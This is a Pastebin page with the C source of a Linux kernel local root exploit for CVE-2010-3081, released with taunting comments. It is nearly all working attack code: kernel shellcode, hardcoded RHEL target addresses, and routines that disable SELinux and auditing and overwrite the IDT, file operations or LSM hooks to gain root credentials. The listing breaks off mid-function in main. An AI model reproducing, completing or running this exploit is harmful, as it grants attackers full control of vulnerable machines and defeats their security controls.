Guest User

unfagged CVE-2010-3081 exploit

a guest
Sep 17th, 2010
580
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. /*
  2.  
  3. Ac1dB1tch3z Vs Linux Kernel x86_64 0day
  4.  
  5. Today is a sad day..
  6.  
  7. R.I.P.  
  8. Tue, 29 Apr 2008  /  Tue, 7 Sep 2010
  9.  
  10. a bit of history:
  11. MCAST_MSFILTER Compat mode bug found... upon commit! (2 year life on this one)
  12.  
  13. author    David L Stevens <dlstevens () us ibm com>    
  14.     Tue, 29 Apr 2008 10:23:22 +0000 (03:23 -0700)
  15. committer    David S. Miller <davem () davemloft net>    
  16.     Tue, 29 Apr 2008 10:23:22 +0000 (03:23 -0700)
  17. This patch adds support for getsockopt for MCAST_MSFILTER for
  18. both IPv4 and IPv6. It depends on the previous setsockopt patch,
  19. and uses the same method.
  20.  
  21. Signed-off-by: David L Stevens <dlstevens () us ibm com>
  22. Signed-off-by: YOSHIFUJI Hideaki <yoshfuji () linux-ipv6 org>
  23. Signed-off-by: David S. Miller <davem () davemloft net>
  24. ------------------------------------------------------------                
  25.  
  26. Thank you for signing-off on this one guys.
  27.  
  28. This exploit has been tested very thoroughly
  29. over the course of the past few years on many many targets.
  30.  
  31. Thanks to redhat for being nice enough to backport it into early
  32. kernel versions (anything from later August 2008+)
  33.  
  34. Ac1dB1tch3z would like to say FUCK YOU Ben Hawkes. You are a new hero! You saved the
  35. plan8 man. Just a bit too l8.
  36.  
  37. PS:
  38. OpenVZ Payload / GRsec bypass removed for kidiots and fame whores. (same thing right ;))
  39.  
  40. */
  41.  
  42. #include <poll.h>
  43. #include <string.h>
  44. #include <unistd.h>
  45. #include <sys/types.h>
  46. #include <stdlib.h>
  47. #include <sys/wait.h>
  48. #include <sys/utsname.h>
  49. #include <sys/socket.h>
  50. #include <sched.h>
  51. #include <netinet/in.h>
  52. #include <stdio.h>
  53. #include <sys/stat.h>
  54. #include <fcntl.h>
  55. #include <sys/mman.h>
  56. #include <sys/ipc.h>
  57. #include <sys/msg.h>
  58. #include <errno.h>
  59.  
  60.  
  61. #ifndef __i386__
  62. #error "r34d th3 c0d3 m0r0n!!# () #"
  63. #else
  64. #define _GNU_SOURCE
  65. #define __uint unsigned int
  66. #define __ulonglong unsigned long long
  67. #define __memcpy__ memcpy
  68.  
  69. #define VERT                  "\033[32m"
  70. #define NORM                  "\033[0m"
  71. #define BANNER                VERT"Ac1dB1tCh3z "NORM"VS Linux kernel 2.6 kernel 0d4y\n"
  72.  
  73. #define KALLSYMS              "/proc/kallsyms"
  74. #define TMAGIC_LIST           "/proc/timer_list"
  75. #define SELINUX_PATH          "/selinux/enforce"
  76. #define RW_FOPS               "timer_list_fops"
  77. #define PER_C_CTASK           "per_cpu__current_task"
  78. #define PREPARE_CREDS         "prepare_creds"
  79. #define OVERRIDE_CREDS        "override_creds"
  80. #define REVERT_CREDS          "revert_creds"
  81. #define Y0Y0SMAP              0x100000UL
  82. #define Y0Y0CMAP              0x200000UL
  83. #define Y0Y0STOP              (Y0Y0SMAP+0xFFC)
  84. #define J0J0S                 0x00200000UL
  85. #define J0J0R00T              0x002000F0UL
  86. #define PAGE_SIZE             0x1000
  87.  
  88. #define KERN_X1     0x1
  89. #define KERN_X2     0x2
  90. #define KERN_X4     0x4
  91.  
  92.  
  93. #define KERN_DIS_X8_IDT      0x8
  94. #define KERN_DIS_X10_FOPS     0x10
  95. #define KERN_DIS_X20_LSM      0x20
  96.  
  97. #define KERN_DIS_X40_SELINUX  0x40
  98.  
  99. #define isrhel(ver) (strstr(ver, ".el4") || strstr(ver,".el5"))
  100.  
  101. #define TRY_REMAP_DEFAULT 1
  102.  
  103. #define __fprint_alias(f, a...) do { fprintf(stdout, f, ## a); } while(0)
  104. #define __fprint_string(s) do { fprintf(stdout, "%s", s); } while(0)
  105. #define __perror_out(s) do { perror(s); exit(-1); } while(0)
  106. #define __fprint_error_out(s) do { fprintf(stderr, s); exit(-1); } while(0)
  107.  
  108. static char buffer[1024];
  109. static int s;
  110. static int flags=0;
  111. volatile static socklen_t magiclen=0;
  112. static int useidt=0, usefops=0, uselsm=0;
  113. static __ulonglong _m_fops=0,_m_cred[3] = {0,0,0};
  114. static __uint _m_cpu_off=0;
  115. static char krelease[64];
  116. static char kversion[128];
  117.  
  118. #define SC1_OFF 14
  119. static char shellcode1[]=
  120. "\x51\x57\x53\x56\x48\x31\xc9\x48\x89\xf8\x48\x31\xf6\xbe\x41\x41\x41\x41"  
  121. "\x3b\x30\x75\x1f\x3b\x70\x04\x75\x1a\x3b\x70\x08\x75\x15\x3b\x70\x0c"  
  122. "\x75\x10\x48\x31\xdb\x89\x18\x89\x58\x04\x89\x58\x08\x89\x58\x0c\xeb\x11"    
  123. "\x48\xff\xc0\x48\xff\xc1\x48\x81\xf9\x4c\x04\x00\x00\x74\x02"                  
  124. "\xeb\xcc\x5e\x5b\x5f\x59\xc3";              
  125.  
  126.  
  127. #define SC2_OFF1 5
  128. #define SC2_OFF2 21
  129. #define SC2_OFF3 45
  130. char shellcode2[]=
  131. "\x53\x52\x57\x48\xbb\x41\x41\x41\x41\x41\x41\x41\x41\xff\xd3"                                
  132. "\x50\x48\x89\xc7\x48\xbb\x42\x42\x42\x42\x42\x42\x42\x42"  
  133. "\xff\xd3\x48\x31\xd2\x89\x50\x04\x89\x50\x14\x48\x89\xc7"                              
  134. "\x48\xbb\x43\x43\x43\x43\x43\x43\x43\x43"  
  135. "\xff\xd3\x5f\x5f\x5a\x5b\xc3";                                      
  136.  
  137.  
  138. #define RZ_OFF_FOPLSD 13
  139. #define RZ_CPUOFF_FOPLSD 7
  140. #define RZ_SEOFF_FOPLSD 25
  141. static char ring_zero_foplsd_sc[]=
  142. "\x57\x50\x65\x48\x8b\x3c\x25\x00\x00\x00\x00"
  143. "\x48\xb8\x41\x41\x41\x41\x41\x41\x41\x41\xff\xd0"                      
  144. "\x58\x5f"
  145. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  146. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  147. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  148. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  149. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  150. "\xc3";
  151.  
  152.  
  153. /* implement selinux bypass for IDT ! */
  154. #define RZ_OFF_IDT 14
  155. #define RZ_CPUOFF_IDT 8
  156. #define RZ_SEOFF_IDT 27
  157. static char ring_zero_idt_sc[]=
  158. "\x0f\x01\xf8\x65\x48\x8b\x3c\x25\x00\x00\x00\x00"      
  159. "\x48\xb8\x41\x41\x41\x41\x41\x41\x41\x41\xff\xd0"                                  
  160. "\x0f\x01\xf8"
  161. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  162. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  163. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  164. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  165. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  166. "\x48\xcf";  
  167.  
  168.  
  169.  
  170. #define SC5_ENFORCE_OFF  10
  171. #define SC5_AUDIT_OFF      23
  172. // disable selinux?
  173. static char shellcode5[]=
  174. "\x41\x52\x50"
  175. "\xb8\x00\x00\x00\x00"
  176. "\x49\xba\x41\x41\x41\x41\x41\x41\x41\x41"
  177. "\x41\x89\x02"
  178. "\x49\xba\x42\x42\x42\x42\x42\x42\x42\x42"
  179. "\x41\x89\x02"
  180. "\x58\x41\x5a";          
  181.  
  182.  
  183.  
  184.  
  185. /* rhel LSM stuffs */
  186. #define RHEL_LSM_OFF 98
  187.  
  188. struct LSM_rhel
  189. {
  190.   __ulonglong selinux_ops;
  191.   __ulonglong capability_ops;
  192.   __ulonglong dummy_security_ops;
  193.  
  194.   __ulonglong selinux_enforcing;
  195.   __ulonglong audit_enabled;
  196.  
  197.   const char *krelease;
  198.   const char *kversion;
  199.  
  200. };
  201.  
  202. struct LSM_rhel known_targets[4]=
  203. {
  204.   {
  205.     0xffffffff8031e600ULL,
  206.     0xffffffff8031fec0ULL,
  207.     0xffffffff804acc00ULL,
  208.  
  209.     0xffffffff804af960ULL,
  210.     0xffffffff8049b124ULL,
  211.  
  212.     "2.6.18-164.el5",
  213.     "#1 SMP Thu Sep 3 03:28:30 EDT 2009"  // to manage minor/bug fix changes
  214.   },
  215.   {
  216.    0xffffffff8031f600ULL,
  217.    0xffffffff80320ec0ULL,
  218.    0xffffffff804afc00ULL,
  219.  
  220.    0xffffffff804b2960ULL,
  221.    0xffffffff8049e124ULL,
  222.  
  223.    "2.6.18-164.11.1.el5",
  224.    "#1 SMP Wed Jan 6 13:26:04 EST 2010"
  225.   },
  226.   {
  227.     0xffffffff805296a0ULL,
  228.     0xffffffff8052af60ULL,
  229.     0xffffffff806db1e0ULL,
  230.  
  231.     0xffffffff806ddf40ULL,
  232.     0xffffffff806d5324ULL,
  233.  
  234.     "2.6.18-164.11.1.el5xen",
  235.     "#1 SMP Wed Jan 20 08:06:04 EST 2010"   // default xen
  236.   },
  237.   {
  238.     0xffffffff8031f600ULL,// d selinux_ops
  239.     0xffffffff80320ec0ULL,// d capability_ops
  240.     0xffffffff804afc00ULL,// B dummy_security_ops
  241.  
  242.     0xffffffff804b2960ULL,// B selinux_enforcing
  243.     0xffffffff8049e124ULL,// B audit_enabled
  244.  
  245.     "2.6.18-164.11.1.el5",
  246.     "#1 SMP Wed Jan 20 07:32:21 EST 2010" // tripwire target LoL
  247.    }
  248.  
  249. };
  250.  
  251. static struct LSM_rhel *curr_target=NULL, dynamictarget;
  252.  
  253. struct socketcallAT
  254. {
  255.   int s;
  256.   int level;
  257.   int optname;
  258.   void *optval;
  259.   volatile socklen_t *optlen;  
  260. }__attribute__((packed));
  261.  
  262. struct idt64from32_s
  263. {
  264.   unsigned short limit;
  265.   unsigned long base;
  266. }__attribute__((packed));
  267.  
  268. static __ulonglong getidt()
  269. {
  270.   struct idt64from32_s idt;
  271.   memset(&idt, 0x00, sizeof(struct idt64from32_s));
  272.   asm volatile("sidt %0" : "=m"(idt));
  273.   return idt.base | 0xFFFFFFFF00000000ULL;
  274. }
  275.  
  276.  
  277. static int isSelinuxEnabled()
  278. {
  279.   FILE *selinux_f;
  280.   selinux_f = fopen(SELINUX_PATH, "r");
  281.   if(selinux_f == NULL)
  282.   {
  283.     if(errno == EPERM)
  284.       return 1;
  285.     else
  286.      return 0;
  287.   }
  288.  
  289.   fclose(selinux_f);
  290.   return 1;
  291. }
  292.  
  293. static int get_release(char *out_release, char* out_version)
  294. {
  295.  int ret; const char*ptr;
  296.  int count=0;
  297.  char r[32], *bptr;
  298.  struct utsname buf;
  299.  ret =  uname(&buf);
  300.  
  301.  if(ret < 0)
  302.    return -1;
  303.  
  304.  strcpy(out_release, buf.release);
  305.  strcpy(out_version, buf.version);
  306.  
  307.  ptr = buf.release;
  308.  bptr = r;
  309.  memset(r, 0x00, sizeof(r));
  310.  while(*ptr)
  311.  {
  312.    if(count == 2)
  313.     {
  314.       if(*ptr >= '0' && *ptr <= '9')
  315.         *bptr++ = *ptr;
  316.       else
  317.         break;
  318.     }
  319.  
  320.    if(*ptr == '.')
  321.      count++;
  322.    ptr++;
  323.  }
  324.  
  325.  if(strlen(r) < 1 || !atoi(r))
  326.    return -1;
  327.  
  328.  return atoi(r);
  329. }
  330.  
  331.  
  332. static void patch_selinux(struct LSM_rhel *table)
  333. {
  334.   *((__ulonglong *)(shellcode5 + SC5_ENFORCE_OFF)) = table->selinux_enforcing;
  335.   *((__ulonglong *)(shellcode5 + SC5_AUDIT_OFF)) = table->audit_enabled;
  336.   __memcpy__(ring_zero_foplsd_sc + RZ_SEOFF_FOPLSD, shellcode5, sizeof(shellcode5)-1);
  337.   __memcpy__(ring_zero_idt_sc + RZ_SEOFF_IDT, shellcode5, sizeof(shellcode5)-1);
  338. }
  339.  
  340.  
  341. static __ulonglong get_sym_ex(const char* s, const char* filename, int ignore_flag)
  342. {
  343.   FILE *ka;
  344.   char line[512];
  345.   char reloc_a[64];
  346.   char reloc[64];
  347.  
  348.   if(!(flags & KERN_X4) && !ignore_flag)
  349.     return 0;
  350.  
  351.   ka = fopen(filename, "r");
  352.   if(!ka)
  353.     return 0;
  354.  
  355.   while(fgets(line, 512, ka) != NULL)
  356.   {
  357.     char *l_p  = line;
  358.     char *ra_p = reloc_a;
  359.     char *r_p    = reloc;
  360.     memset(reloc, 0x00, sizeof(reloc));
  361.     memset(reloc_a, 0x00, sizeof(reloc_a));
  362.     while(*l_p != ' ' && (ra_p - reloc_a)  < 64)
  363.       *ra_p++ = *l_p++;  
  364.     l_p += 3;
  365.     while(*l_p != ' ' && *l_p != '\n' && *l_p != '\t' && (r_p - reloc) < 64)
  366.       *r_p++ = *l_p++;
  367.  
  368.     if(!strcmp(reloc, s))
  369.     {
  370.       __fprint_alias("$$$ %s->%s\n", s, reloc_a);
  371.       return strtoull(reloc_a, NULL, 16);
  372.     }
  373.   }
  374.  
  375.   return 0;
  376. }
  377.  
  378.  
  379. static inline __ulonglong get_sym(const char* s)
  380. {
  381.   return get_sym_ex(s, KALLSYMS, 0);
  382. }
  383.  
  384. static int parse_cred(const char* val)
  385. {
  386.   int i=0;
  387.   const char* p = val;
  388.   char local[64], *l;
  389.   for(i=0; i<3; i++)  
  390.   {
  391.     memset(local, 0x00, sizeof(local));
  392.     l = local;
  393.     while(*p && *p != ',')
  394.       *l++ = *p++;
  395.  
  396.     if(!(*p) && i != 2)
  397.       return -1;
  398.  
  399.     _m_cred[i] = strtoull(local, NULL, 16);
  400.     p++;
  401.   }
  402.  
  403.   return 0;
  404. }
  405.  
  406.  
  407. #define SELINUX_OPS        "selinux_ops"
  408. #define DUMMY_SECURITY_OPS "dummy_security_ops"
  409. #define CAPABILITY_OPS     "capability_ops"
  410. #define SELINUX_ENFORCING  "selinux_enforcing"
  411. #define AUDIT_ENABLED      "audit_enabled"
  412.  
  413. struct LSM_rhel *lsm_rhel_find_target(int check_rhel)
  414. {
  415.    int i;
  416.    char mapbuf[128];
  417.    struct LSM_rhel *lsm = &(known_targets[0]);
  418.  
  419.    if(check_rhel && !isrhel(krelease))
  420.    {
  421.      __fprint_string("!!! Not a RHEL kernel \n");
  422.      return NULL;
  423.    }
  424.  
  425.    __fprint_string("$$$ Looking for known targets.. \n");
  426.    for(i=0; i<sizeof(known_targets)/sizeof(struct LSM_rhel); i++, lsm++)
  427.    {
  428.      if(!strcmp(krelease, lsm->krelease) && !strcmp(kversion, lsm->kversion))
  429.      {
  430.        __fprint_alias("$$$ Known target: %s %s \n", lsm->krelease, lsm->kversion);
  431.        return lsm;
  432.      }
  433.    }
  434.  
  435.    __fprint_string("$$$ Finding target...\n");
  436.    strcpy(mapbuf, "/boot/System.map-");
  437.    strcat(mapbuf, krelease);
  438.  
  439.    dynamictarget.selinux_ops        = get_sym_ex(SELINUX_OPS, mapbuf, 1);
  440.    dynamictarget.dummy_security_ops = get_sym_ex(DUMMY_SECURITY_OPS, mapbuf, 1);
  441.    dynamictarget.capability_ops     = get_sym_ex(CAPABILITY_OPS, mapbuf, 1);
  442.    dynamictarget.selinux_enforcing  = get_sym_ex(SELINUX_ENFORCING, mapbuf, 1);
  443.    dynamictarget.audit_enabled      = get_sym_ex(AUDIT_ENABLED, mapbuf, 1);
  444.  
  445.  
  446.    if(!dynamictarget.selinux_ops ||
  447.       !dynamictarget.dummy_security_ops ||
  448.       !dynamictarget.capability_ops ||
  449.       !dynamictarget.selinux_enforcing ||
  450.       !dynamictarget.audit_enabled)
  451.   return NULL;
  452.  
  453.  
  454.    return &dynamictarget;
  455. }
  456.  
  457. static void prep(int argc, char *argv[])
  458. {
  459.   int fd,ver,ret;
  460.   char __b[16];
  461.  
  462.  
  463.   fd = open(KALLSYMS, O_RDONLY);
  464.   ret = read(fd, __b, 16); // dummy read
  465.   if((fd >= 0 && ret > 0))
  466.   {
  467.     __fprint_string("$$$ Kallsyms +r\t\n"); // d0nt p4tch m3 br0
  468.     flags |= KERN_X4;
  469.   }
  470.   close(fd);
  471.  
  472.   ver = get_release(krelease, kversion);
  473.   if(ver < 0)
  474.     __fprint_error_out("!!!  Unable to get release!\n");
  475.  
  476.   __fprint_alias("$$$ Kernel release: %s\n", krelease);
  477.  
  478.  
  479.   if(argc != 1)
  480.   {
  481.     while( (ret = getopt(argc, argv, "siflc:k:o:")) > 0)
  482.     {
  483.       switch(ret)
  484.       {
  485.         case 'i':
  486.           flags |= KERN_DIS_X20_LSM|KERN_DIS_X10_FOPS;
  487.           useidt=1; // u have to use -i to force IDT Vector
  488.           break;
  489.  
  490.         case 'f':
  491.           flags |= KERN_DIS_X20_LSM|KERN_DIS_X8_IDT;
  492.           break;
  493.  
  494.   case 'l':
  495.     flags |= KERN_DIS_X8_IDT|KERN_DIS_X10_FOPS;
  496.     break;
  497.  
  498.         case 'c':
  499.           if(!optarg || parse_cred(optarg) < 0)
  500.               __fprint_error_out("!!! Unable to pass cred codes\n");
  501.           break;
  502.  
  503.         case 'k':
  504.           if(optarg)
  505.             _m_fops = strtoull(optarg, NULL, 16);
  506.           else
  507.        __fprint_error_out("!!! Unable to parse fops numbersn");
  508.           break;
  509.  
  510.         case 's':
  511.           if(!isSelinuxEnabled())
  512.             __fprint_string("??? Selinux is not enabled\n");
  513.           else
  514.             flags |= KERN_DIS_X40_SELINUX;
  515.           break;
  516.            
  517.         case 'o':
  518.           if(optarg)
  519.             _m_cpu_off = strtoull(optarg, NULL, 16);
  520.     else
  521.       __fprint_error_out("!!! Unable to parse fops computer numbers\n");
  522.           break;
  523.       }
  524.     }
  525.   }
  526.  
  527.  
  528.   if(ver >= 29) // needs cred structure
  529.   {
  530.     flags |= KERN_X2;
  531.  
  532.     if(!_m_cred[0] || !_m_cred[1] || !_m_cred[2])
  533.     {
  534.       _m_cred[0] = get_sym(PREPARE_CREDS);
  535.       _m_cred[1] = get_sym(OVERRIDE_CREDS);
  536.       _m_cred[2] = get_sym(REVERT_CREDS);
  537.     }
  538.  
  539.     if(!_m_cred[0] || !_m_cred[1] || !_m_cred[2])
  540.     {
  541.       __fprint_error_out("!!! Error in setting cred shellcode\n");
  542.     }
  543.    
  544.     __fprint_string("$$$ Kernel Credentials detected\n");
  545.     *((__ulonglong *)(shellcode2 + SC2_OFF1)) = _m_cred[0];
  546.     *((__ulonglong *)(shellcode2 + SC2_OFF2)) = _m_cred[1];
  547.     *((__ulonglong *)(shellcode2 + SC2_OFF3)) = _m_cred[2];
  548.   }
  549.  
  550.   if(ver >= 30)  // needs cpu offset
  551.   {
  552.     flags |= KERN_X1;
  553.     if(!_m_cpu_off)
  554.     _m_cpu_off = (__uint)get_sym(PER_C_CTASK);
  555.  
  556.     if(!_m_cpu_off)
  557.       __fprint_error_out("!!! Error in setting cred shellcode\n");
  558.  
  559.     __fprint_string("$$$ Kernel per_cpu relocs enabled!\t\n");
  560.     *((__uint *)(ring_zero_foplsd_sc + RZ_CPUOFF_FOPLSD)) = _m_cpu_off;
  561.     *((__uint *)(ring_zero_idt_sc + RZ_CPUOFF_IDT)) = _m_cpu_off;
  562.   }
  563. }
  564.  
  565.  
  566. static void env_prepare(int argc, char* argv[])
  567. {
  568.  
  569.   prep(argc, argv);
  570.  
  571.   if(!(flags & KERN_DIS_X10_FOPS))  // try fops
  572.   {
  573.     __fprint_string("??? Trying the fops method\n");
  574.     if(!_m_fops)
  575.       _m_fops = get_sym(RW_FOPS);
  576.  
  577.     /* TODO: do RW check for newer -mm kernels which has timer_list_struct RO
  578.      * Thanks to the guy who killed this vector... you know who you are:)
  579.      * Lucky for you, there are more:)
  580.      */
  581.  
  582.     if(_m_fops)
  583.     {
  584.       usefops=1;
  585.       __fprint_string("$$$ Using fops\n");
  586.     }
  587.   }
  588.  
  589.  
  590.   if(!usefops && !(flags & KERN_DIS_X20_LSM)) // try lsm(rhel)
  591.   {
  592.     curr_target = lsm_rhel_find_target(1);
  593.     if(!curr_target)
  594.     {
  595.        __fprint_string("!!! Unable to find lsm target\n");
  596.     }
  597.     else
  598.       uselsm=1;
  599.   }
  600.  
  601.  
  602.   if(useidt && (flags & KERN_DIS_X40_SELINUX))
  603.   {
  604.     // -i flag
  605.     curr_target = lsm_rhel_find_target(0);
  606.     if(!curr_target)
  607.     {
  608.        __fprint_string("!!! Unable to find idt target: continue without selinux disable.\n");
  609.        /* remove Selinux Flag */
  610.        flags &= ~KERN_DIS_X40_SELINUX;
  611.     }
  612.   }
  613.  
  614.  
  615.   if(!usefops && !useidt && !uselsm)
  616.     __fprint_error_out("!!! Everything failed\n");  
  617. }
  618.  
  619.  
  620. static inline int get_socklen(__ulonglong addr, __uint stack)
  621. {
  622.   int socklen_l = 8 + stack - addr - 16;
  623.   return socklen_l;
  624. }
  625.  
  626. static struct socketcallAT at;
  627. static __uint idtover[4] =
  628.              {0x00100000UL,
  629.               0x0020ee00UL,
  630.               0x00000000UL,
  631.               0x00000000UL};
  632.  
  633.  
  634. static void fillsocketcallAT()
  635. {
  636.  at.s = s;
  637.  at.level = SOL_IP;
  638.  at.optname = MCAST_MSFILTER;
  639.  at.optval = buffer;
  640.  at.optlen = &magiclen;
  641. }
  642.  
  643.  
  644. static void socket_call(struct socketcallAT *at, void *stack)
  645. {
  646.   asm volatile(
  647.       "push %%ebx\t\n"
  648.       "push %%esi\t\n"
  649.       "push %%ecx\t\n"
  650.       "push %%edx\t\n"
  651.       "movl $0x66, %%eax\t\n"
  652.       "movl $0xf, %%ebx\t\n"
  653.       "movl %%esp, %%esi\t\n"
  654.       "movl %0, %%ecx\t\n"
  655.       "movl %1, %%esp\t\n"
  656.       "int $0x80\t\n"
  657.       "movl %%esi, %%esp\t\n"
  658.       "pop %%edx\t\n"
  659.       "pop %%ecx\t\n"
  660.       "pop %%esi\t\n"
  661.       "pop %%ebx\t\n"
  662.       :  : "r"(at), "r"(stack)  : "memory", "eax", "ecx", "ebx", "esi"
  663.      );
  664. }
  665.  
  666. static void __setmcbuffer(__uint value)
  667. {
  668.   int i;
  669.   __uint *p = (__uint*)buffer;
  670.   for(i=0; i<sizeof(buffer)/sizeof(void*); i++)
  671.     *(p+i) = value;
  672. }
  673.  
  674. static void idt_smash(__ulonglong idtbase)
  675. {
  676.   int i;
  677.   __uint curr;
  678.   for(i=0; i<sizeof(idtover)/sizeof(idtover[0]);i++)
  679.   {
  680.     curr = idtover[i];
  681.     __setmcbuffer(curr);
  682.     magiclen =  get_socklen(idtbase + (i*4), Y0Y0STOP);
  683.     socket_call(&at, (void*)Y0Y0STOP);
  684.   }
  685. }
  686.  
  687.  
  688. static void y0y0stack()
  689. {
  690.   void* map = mmap((void*)Y0Y0SMAP,
  691.                    PAGE_SIZE,
  692.                    PROT_READ|PROT_WRITE,
  693.                    MAP_ANONYMOUS|MAP_PRIVATE|MAP_FIXED,
  694.                    -1,0);
  695.   if(MAP_FAILED == map)
  696.     __perror_out("mmap");
  697. }
  698.  
  699. static void y0y0code()
  700. {
  701.   void* map = mmap((void*)Y0Y0CMAP,
  702.                    PAGE_SIZE,
  703.  
  704. #ifdef TRY_REMAP_DEFAULT
  705.        PROT_READ|PROT_WRITE,
  706. #else
  707.                    PROT_READ|PROT_WRITE|PROT_EXEC,
  708. #endif
  709.                    MAP_ANONYMOUS|MAP_PRIVATE|MAP_FIXED,
  710.                    -1,0);
  711.   if(MAP_FAILED == map)
  712.     __perror_out("mmap");
  713.  
  714. }
  715.  
  716.  
  717. static int mapy0y0code(unsigned long old)
  718. {
  719.   int fd;
  720.   void *map;
  721.   volatile char wizard;
  722.   char cwd[1024];
  723.  
  724.   getcwd(cwd, sizeof(cwd));  
  725.   strcat(cwd, "/__tmpfile");
  726.  
  727.   unlink(cwd);
  728.   fd = open(cwd, O_RDWR|O_CREAT, S_IRWXU);
  729.   if(fd < 0)
  730.     return -1;
  731.  
  732.   write(fd, (const void*)old, PAGE_SIZE);
  733.   if(munmap((void*)old, PAGE_SIZE) < 0)
  734.     return -1;
  735.  
  736.   map = mmap((void*)old,
  737.                    PAGE_SIZE,
  738.                    PROT_READ|PROT_EXEC,
  739.                    MAP_PRIVATE|MAP_FIXED,
  740.                    fd,0);
  741.   if(map == MAP_FAILED)
  742.     return -1;
  743.  
  744.   /* avoid lazy page fault handler
  745.    * Triple Fault when using idt vector
  746.    * and no pages are already mapped:)
  747.    */
  748.  
  749.   wizard = *((char*)old);
  750.   unlink(cwd);
  751.   return wizard;
  752. }
  753.  
  754.  
  755. int main(int argc, char*argv[])
  756. {
  757.   int uid,fd;
  758.   __ulonglong *patch, idtb;
  759.   struct pollfd pfd;
  760.  
  761.  
  762.   printf(BANNER);
  763.  
  764.   uid = getuid();
  765.  
  766.   env_prepare(argc, argv);
  767.  
  768.   y0y0stack();
  769.   y0y0code();
  770.  
  771.   if(useidt)
  772.   {
  773.     idtb = getidt();
  774.     __fprint_alias("$$$ Home base address: %llx\n", idtb);
  775.     __fprint_string("$$$ Building ringzero shellcode - IDT method\n");  
  776.     patch = (__ulonglong*)(ring_zero_idt_sc + RZ_OFF_IDT);
  777.     *patch = (__ulonglong)(J0J0R00T);
  778.  
  779.     __fprint_string("$$$ Preparing\n");
  780.  
  781.     if(flags & KERN_DIS_X40_SELINUX)
  782.     {
  783.       __fprint_string("$$$ Adding code to remove selinux\n");
  784.       patch_selinux(curr_target);
  785.     }
  786.      
  787.     __memcpy__((void*)J0J0S,  ring_zero_idt_sc, sizeof(ring_zero_idt_sc));
  788.   }
  789.   else if(usefops || uselsm)
  790.   {
  791.     __fprint_string("$$$ Building ringzero shellcode - FOP/LSD(M) method\n");  
  792.     patch = (__ulonglong*)(ring_zero_foplsd_sc + RZ_OFF_FOPLSD);
  793.     *patch = (__ulonglong)(J0J0R00T);
  794.  
  795.     __setmcbuffer(J0J0S);
  796.  
  797.     __fprint_string("$$$ Preparing\n");
  798.     if(uselsm && (flags & KERN_DIS_X40_SELINUX))
  799.     {
  800.         __fprint_string("$$$ Adding code to remove selinux\n");
  801.         patch_selinux(curr_target);
  802.     }
  803.     __memcpy__((void*)J0J0S, ring_zero_foplsd_sc, sizeof(ring_zero_foplsd_sc));
  804.   }
  805.  
  806.  
  807.  
  808.   /* set shellcode level 2 */
  809.   if(flags & KERN_X2)
  810.   {
  811.     __fprint_string("$$$ Using cred shellcode\n");
  812.     __memcpy__((void*)J0J0R00T, shellcode2, sizeof(shellcode2));
  813.   }
  814.   else
  815.   {
  816.     __fprint_string("$$$ Using standard shellcode\n");
  817.     __memcpy__((void*)J0J0R00T,  shellcode1, sizeof(shellcode1));
  818.     *((unsigned int*)(J0J0R00T + SC1_OFF)) = uid;
  819.   }
  820.  
  821.   __fprint_string("$$$ Opening magic port\n");
  822.   s = socket(AF_INET, SOCK_DGRAM, 0);
  823.   if(s < 0)
  824.     __perror_out("socket");
  825.  
  826.   fillsocketcallAT();
  827.  
  828.  
  829. #ifdef TRY_REMAP_DEFAULT
  830.   if(mapy0y0code(Y0Y0CMAP) < 0)
  831.     __fprint_error_out("!!! Unable to remap\t\n");
  832. #endif
  833.  
  834.   if(useidt)
  835.   {
  836.  
  837.     __ulonglong idtentry = idtb + (2*sizeof(__ulonglong)*0xdd);
  838.     __fprint_alias("$$$ Usinf IDT entry: %d\n", 0xdd);
  839.     idt_smash((idtentry));
  840.  
  841.     sleep(1);
  842.     asm volatile("int $0xdd\t\n");
  843.   }
  844.   else if(usefops)
  845.   {
  846.     magiclen = get_socklen(_m_fops, Y0Y0STOP);
  847.     magiclen -= 7*sizeof(__ulonglong);
  848.     __fprint_alias("$$$ Magic port len found:: 0x%x\n", magiclen);
  849.  
  850.     __fprint_string("$$$ fops\n");
  851.     socket_call(&at, (void*)Y0Y0STOP);
  852.     sleep(1);
  853.  
  854.     fd = open(TMAGIC_LIST, O_RDONLY);
  855.     if(fd < 0)
  856.       __perror_out("!!! Error timer_list");
  857.    
  858.     pfd.fd = fd;
  859.     pfd.events = POLLIN | POLLOUT;
  860.     poll(&pfd, 1, 0);
  861.   }
  862.   else if(uselsm)
  863.   {
  864.     int msqid;
  865.     __ulonglong selinux_msg_off = curr_target->selinux_ops + (8*RHEL_LSM_OFF);
  866.     __ulonglong dummy_msg_off   = curr_target->dummy_security_ops + (8*RHEL_LSM_OFF);
  867.     __ulonglong capability_msg_off = curr_target->capability_ops + (8*RHEL_LSM_OFF);
  868.  
  869.  
  870.     msqid = msgget(0, IPC_PRIVATE|0600);
  871.     if(msqid < 0)
  872.       __perror_out("!!! msgget fail");
  873.      
  874.  
  875.     magiclen =  get_socklen(selinux_msg_off, Y0Y0STOP);
  876.     __setmcbuffer(J0J0S);
  877.     socket_call(&at, (void*)Y0Y0STOP);
  878.     magiclen = get_socklen(selinux_msg_off+4, Y0Y0STOP);
  879.     __setmcbuffer(0);
  880.     socket_call(&at, (void*)Y0Y0STOP);
  881.  
  882.  
  883.     magiclen =  get_socklen(dummy_msg_off, Y0Y0STOP);
  884.     __setmcbuffer(J0J0S);
  885.     socket_call(&at, (void*)Y0Y0STOP);
  886.     magiclen =  get_socklen(dummy_msg_off+4, Y0Y0STOP);
  887.     __setmcbuffer(0);
  888.     socket_call(&at, (void*)Y0Y0STOP);
  889.  
  890.  
  891.     magiclen =  get_socklen(capability_msg_off, Y0Y0STOP);
  892.     __setmcbuffer(J0J0S);
  893.     socket_call(&at, (void*)Y0Y0STOP);
  894.     magiclen =  get_socklen(capability_msg_off+4, Y0Y0STOP);
  895.     __setmcbuffer(0);
  896.     socket_call(&at, (void*)Y0Y0STOP);
  897.  
  898.  
